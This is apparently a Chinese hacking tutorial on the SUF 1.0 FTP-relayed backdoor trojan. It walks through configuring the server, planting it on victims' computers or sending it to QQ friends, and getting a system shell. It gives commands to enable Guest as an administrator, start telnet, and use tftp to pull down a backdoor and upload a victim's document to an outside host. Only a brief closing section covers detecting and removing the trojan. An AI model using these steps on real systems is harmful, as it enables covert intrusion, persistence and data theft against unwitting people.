SUF（Shell Use Ftp）顾名思义，就是通过FTP的Shell。这种奇妙的思路真叫绝的，它充分利用防火墙“外严内不严”的漏洞，客户端生成服务端后，把客户端主机的IP发送到FTP里，然后别人运行服务端后下载IP文件，然后通过反向连接，使客户端知道服务端上线，然后把要执行的命令发送到FTP里，服务端再读取FTP里要执行的命令，最后完成执行。

说了这么一大堆，SUF是不是真的有这么厉害？用事实来说明一切，跟我来……

一、摩拳擦掌——配置服务端

和一般的木马后门大体相同，首先将下载下来的SUF 1.0解压缩，双击运行其中的client.exe，出现如图1所示的主窗口，非常简洁明了吧！点击“配置服务端”按钮，弹出了如图2所示的配置对话窗口，这里仅需要配置一下FTP服务选项。在“FTP”栏中填入一个有写权限的FTP服务器，如：Ftp.abc.com或者220.202.242.98。接着在“端口”栏中填写好FTP服务器端口，默认为21。再在“用户名”和“密码”栏中输入FTP帐户名称和密码，点击“配置服务器”，出现一提示对话框（如图3），点击“确定”，这时程序就会开始验证FTP服务器，验证成功后请选择木马服务端（server.exe）的路径，最后完成配置。

图1

图2

图3

小提示：如果要给服务端加壳，请在配置服务端之前给服务端（server.exe）加壳，服务端是可重复配置的。同时一定要确保使用的FTP帐户对FTP服务器有写的权限。

二、玩弄骨掌

——轻松来控制

接下来是玩木马后门必不可少的环节，那就是种植木马。种植木马的方法、途径有很多，以前也专门有文章介绍过，大家可以发挥自己的聪明才智，把服务端上传到肉鸡或者发给QQ好友等，当服务端程序被运行后，一般的使用者很难感觉到计算机有异常，防火墙也不会出现报警。其实，一只黑手正在慢慢靠近，服务端程序会自动从FTP服务器中获取客户端的IP地址，然后开始反向连接，这时服务端计算机的IP地址就会出现在客户端的“上线列表”中（如图4）。

图4

小提示：客户端计算机必须是直接连接到Internet，而不能是处于内网中，同时，如果开启了防火墙的话，请打开5915端口。

在“上线列表”中双击某一在线计算机的IP（例如：220.202.242.100），出现“连接到220.202.242.100”对话窗口，这就已经得到了目标计算机的一个系统权限的Shell，现在想干什么就自由发挥吧！

想想既然是送上门的肉鸡，还是留个后门，以便日后再次光顾吧！这里就将Guest帐户激活，并提升为管理员，再开启目标计算机的Telnet服务，下面就看如何来实现？请输入命令：net user guest /active:yes，点击“运行”来激活Guest帐户，再运行命令：net localgroup administrators guest /add，将Guest加入管理员组，最后再运行命令：net start telnet，开启目标计算机的远程登录服务（如图5）。

图5

其实，在这里有很多东东可以应用的，比如可以通过FTP命令或者TFTP来远程下载/上传文件。这里假设已经知道有一个TFTP服务器220.202.242.99，我们从服务器上下载一个后门程序Sy.exe，只要运行命令：tftp 220.202.242.99 get sy.exe；要把肉鸡上的一个数据文档Ccash.doc上传到TFTP服务器只要运行命令：tftp 220.202.242.99 put Ccash.doc。

小提示：Windows自身附带了一个简单的文件上传下载程序Tftp.exe，可要建立TFTP服务器，就得借助TFTPD32了（下载地址：http://www.ldcatv.com/soft/tftpd32.rar)。

三、摆脱控制——隔离隧道

虽然SUF 1.0的实现方法非常隐蔽，可还是能够将其剿灭的，可以借助Active Ports(下载地址：http://www.ldcatv.com/soft/aports.rar)等端口实时监测工具来发现、中止它。如果中了SUF后门，就可在“Active Ports”主窗口中发现两个server.exe进程，其中一个通过4319端口与FTP服务器进行通讯，另一个通过4321端口与客户端计算机进行通讯（如图6）。选择它们，再点击“Terminate Process”来结束进程。然后在资源管理器中将server.exe删除，这样就摆脱了SUF的控制。

图六

SUF下载地址：http://www.ldcatv.com/soft/suf10.zip